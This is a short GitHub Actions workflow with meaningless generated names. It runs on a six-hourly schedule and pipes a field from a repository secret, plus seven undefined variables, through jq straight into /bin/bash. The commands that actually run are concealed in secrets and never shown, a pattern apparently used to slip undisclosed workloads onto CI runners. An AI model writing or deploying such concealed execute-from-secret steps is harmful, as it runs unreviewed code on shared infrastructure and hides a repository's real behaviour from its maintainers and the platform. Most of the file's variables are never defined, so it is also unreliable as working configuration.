name: kongxianqi3178

on:
  workflow_dispatch:
  schedule:
    - cron: '23 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kongxianqi3178
        env:
          zaoxm0799: ${{ secrets.zaoxm0799 }}
        run: |
          echo $zaoxm0799 | jq -r .jddvz801 | /bin/bash
          echo $kopxw30 | jq -r .otsgf81 | /bin/bash
          echo $yqccn5 | jq -r .zjups33673 | /bin/bash
          echo $i82 | jq -r .belif242 | /bin/bash
          echo $le200 | jq -r .diag18 | /bin/bash
          echo $uzel896 | jq -r .wob0606 | /bin/bash
          echo $vodr787 | jq -r .zrxs4 | /bin/bash
          echo $jmujz2 | jq -r .hilf447 | /bin/bash

